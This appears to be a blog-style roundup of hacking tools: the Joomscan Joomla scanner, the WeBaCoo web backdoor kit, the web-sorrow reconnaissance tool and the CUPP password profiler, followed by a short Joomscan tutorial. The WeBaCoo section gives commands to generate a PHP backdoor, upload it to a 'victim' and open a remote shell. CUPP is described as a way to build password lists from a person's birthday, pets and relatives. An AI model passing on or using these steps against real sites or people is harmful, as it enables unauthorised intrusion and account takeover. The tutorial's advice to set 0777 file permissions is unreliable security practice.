JOOMSCAN (JOOMLA SECURITY SCANNER)

                                                           Joomscan
                                 (Joomla Security Scanner)

Joomscan is one of penetration testing tool that help to find the vulnerability in Joomla CMS. The Updated version can detects 673 vulnerabilities . Detects file inclusion, sql injection, command execution vulnerabilities of a target Joomla! web site.

VIDEO TUTORIAL:
http://adf.ly/VVqO6

DOWNLOAD LINK:       LINK 1

WEBACOO - WEB BACKDOOR COOKIE SCRIPT-KIT

                                          WeBaCoo
                        (Web Backdoor Cookie Script-Kit)

Usage: webacoo.pl [options]

Options:

-g Generate backdoor code (-o is required)

-f FUNCTION PHP System function to use


FUNCTION:
1: system (default)
2: shell_exec
3: exec
4: passthru
5: popen

-o OUTPUT Generated backdoor output filename

-r Return un-obfuscated backdoor code

-t Establish remote "terminal" connection (-u is required)

-u URL Backdoor URL

-c C_NAME Cookie name (default: "M-cookie")

-d DELIM Delimiter (default: New random for each request)

-a AGENT HTTP header user-agent (default exist)

-p PROXY Use proxy (tor, ip:port or user:pass:ip:port)

-v LEVEL Verbose level
LEVEL:
0: no additional info (default)
1: print HTTP headers
2: print HTTP headers + data

-h Display help and exit

update Check for updates and apply if any

1. Generate php backdoor file
- ./webacoo.pl -g -o backdoor.php

2. Upload backdoor to victim

3. Use WeBaCoo connect to backdoor
- ./webacoo.pl -t -u http://victim/backdoor.php

4. Now you are in the victim console, do whatever you want :)

VIDEO TUTORIAL:
http://www.youtube.com/watch?v=6PS3ul7_JRo

DOWNLOAD LINK:     LINK 1

WSORROW TOOL

web-sorrow is a PERL based tool used for checking a Web server for misconfiguration, version detection, enumeration, and server information. It is NOT a vulnerability scanner, inspection proxy, DDoS tool or an exploitation framework.

Current Functionality:

-S – stands for standard. a set of Standard tests and includes: indexing of directories testing,
banner grabbing, language detection (should be obvious), robots.txt, and 200 response testing (some servers send a 200 ok for every req)


-Eb – stands for error bagging. The default config for servers is to put the server daemon and version and sometimes even the OS inside of error pages. web-sorrow reqs a URl of 20 random bytes with get and post methods.

-auth – looks for login pages with a list of some of the most common login files and dirs. We don’t need to be very big list of URLs because what else are going to name it?


-cmsPlugins – run a huge list of plugins dirs for cms servers. the list is a bit old (2010)


-I – searches the responses for interesting strings

-Ws – looks for web services such as hosting provider, blogging services, favicon fingerprinting, and cms version info

-Fd – look for generally things people don’t want you to see. The list is generated form a TON of robot.txt so whatever it finds should be interesting
-proxy – send all http reqs via a proxy. example: 255.255.255.254:8080-e – run all the scans in the scannerweb-sorrow also has false positives checking on most of it’s requests (it pretty accurate but not perfect).

VIDEO TUTORIAL:
http://www.youtube.com/watch?v=GoSzXtKGU9o

DOWNLOAD LINK:       LINK 1

Cupp (Common User Passwords Profiler)

Cupp is a common user password profiler. Using this script we can make our own dictionary on someone profiling such as a birthday, nickname, address, name of a pet or relative, or some common works like god, love, money, or any different passwords.

Options:

-h You are looking at it baby! :)
For more help take a look in docs/README
Global configuration file is cupp.cfg


-i Interactive questions for user password profiling

-w Use this option to improve existing dictionary, or WyD.pl output to make some pwnsauce

-l Download huge wordlists from repository

-a Parse default usernames and passwords directly from Alecto DB.
Project Alecto uses purified databases of Phenoelit and CIRT which where merged and enhanced.


-v Version of the program


VIDEO TUTORIAL:
http://www.youtube.com/watch?v=U0kAE3uj4Qs


DOWNLOAD LINK:    LINK 1

How to use Joomscan to find the Joomla Vulnerability in Backtrack 5 Linux?

Joomscan is one of penetration testing tool that help to find the vulnerability in Joomla CMS. TheUpdated version can detects 550 Vulnerabilities. Let me show how to use this joomscan in Backtrack5.

Download the Joomscan from here:
http://web-center.si/joomscan



Step 1: Moving to PenTest folder

Copy/Move the downloaded files in directory

/pentest/web/scanners/joomscan/

Step2: Set Permission

Now you have to set permission for the Joomscan file. In order to this, Type the following command in Terminal(if you don't know how to open terminal at all, please stop reading this and start it from basics of Linux).

CHMOD 0777 joomscan.pl

Step 3: Update

Update the scanner to latest version. To do this, enter the following command in Terminal:

./joomscan.pl update

Step 4: Scanning for Vulnerability

Now everything ok, we have to scan our joomla site for vulnerability. To do this, enter the following command in Terminal:

./joomscan.pl -u www.YourJoomlasite.com

Wait for a while, and it will list of the vulnerability found.